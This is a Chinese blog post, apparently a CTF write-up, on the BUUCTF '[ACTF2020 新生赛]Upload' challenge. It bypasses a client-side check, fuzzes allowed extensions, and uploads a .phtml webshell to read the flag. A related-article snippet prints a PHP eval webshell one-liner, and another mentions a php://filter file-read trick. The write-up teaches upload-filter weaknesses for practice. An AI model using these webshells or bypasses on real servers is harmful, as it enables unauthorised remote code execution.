Buuctf [ACTF2020 新生赛]Upload

最新推荐文章于 2023-11-25 16:57:05 发布
最新推荐文章于 2023-11-25 16:57:05 发布
阅读量395 收藏 1
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52718293/article/details/117789342
版权

在这里插入图片描述先说本题考点吧:php别名绕过
打开是一个灯泡,要我们上传一个文件(文件上传)发现有上传要求
我们可以在前端的html中将下图我标记的白色部分删除即可没有要求
在这里插入图片描述然后我们开始可以试着上传一个php文件,发现上传php文件会被拦截。这种时候我们可以用burpsuite fuzz一下(不会的在文章最后会给大佬的教程) fuzz后发现phtml类型的文件可以上传
在这里插入图片描述文件里我们写一句话木马,和cat flag
在这里插入图片描述
上传成功后即可看到
在这里插入图片描述然后我们url/uplo4d/881d111ef425270b34a18ab8c5762732.phtml
即可看到flag
在这里插入图片描述当然如果我们在文件里不加入cat flag的内容,也可以后续连接蚁剑,同样可以在根目录下找到flag
在这里插入图片描述其实这道题还有很多别的方式拿到flag,但是今天小瑶太累了,你们大致看看就好,说不定以后哪天后再编辑一下这篇文章

最后的最后搬运小能手小瑶小能手又上线了
附赠一个大佬的php函数绕过
大佬的php代码审计之文件上传漏洞
大佬手把手教你如何fuzz

*小瑶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF学习笔记——[ACTF2020 新生]Upload
Obs_cure的博客
02-10 996
一、[ACTF2020 新生]Upload 1.题目 一个很可爱的灯泡,是文件上传类型的题目。先随便试试图片。 2.解题步骤 先上传了一张图片,然后成功了,并且给出了上传的相对路径。这题友好啊~直接挂马 提示要图片后缀结尾的。那试试在burp上改一下~ 尝试了一下发现不对,请求都没有发出去。应该是在前端拦截的。右键检查元素。 发现脚本,直接Remove掉。 马上传成功。用蚁剑连接。这里的马用的是上次的phtml的马,因此一次性上传成功了。 根目录下出现FLAG 马中代码如下 GIF89a&lt
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
[ACTF2020 新生]Upload
m0_62905261的博客
09-07 697
[ACTF2020 新生]Upload
[ACTF 2020 新生] Upload
Web学习之路
05-22 345
文件上传
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
[ACTF2020 新生]Upload Buuctf
qq_53030229的博客
10-28 698
文章目录一、检查源代码二、文件上传1、先尝试图片是否能够上传2、burpsuit抓包、改包3、使用antsword进行连接,获取flag 一、检查源代码 拿到题目之后,我们首先对页面源代码就行检查,源代码查看之后并没有发现提示或者有用线索,所以我们只能回到文件上传中找答案。 二、文件上传 1、先尝试图片是否能够上传 首先,我们尝试上传一张图片,发现图片上传成功 2、burpsuit抓包、改包 注:这是我准备的一句话木马,用来上传图片的 <script language='php'>eval(
BUUCTF [极客大挑战 2019]Upload
m0_49025459的博客
05-12 4712
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
BUUCTF——[极客大挑战2019]Upload-1
最新发布
weixin_62248541的博客
11-25 440
BUUCTF-[极客大挑战2019]Upload-1
BUUCTF [web专项14][ACTF2020 新生]Upload
yanglinchiji的博客
11-03 160
提交后发现需要后缀对应,有后缀检测,那就修改成符合的后缀进行上传,过程抓包再改过来就行。因为我怕有各种过滤,就用上次的upload的一句话代码了(web专项13有)进入后返回根目录即可获取flag。先进入上传点看看是否执行。进入后在这里上传文件。
BUUCTF-Web:[极客大挑战 2019]Upload
m0_56161093的博客
05-29 815
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
buuctf ACTF2020 Include
09-16
根据提供的引用内容,buuctf ACTF2020的Include功能可能存在文件包含漏洞。通过将URL中的参数修改为"?file=php://filter/convert.base64-encode/resource=flag.php",可以尝试读取flag.php文件并将其内容以Base64...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值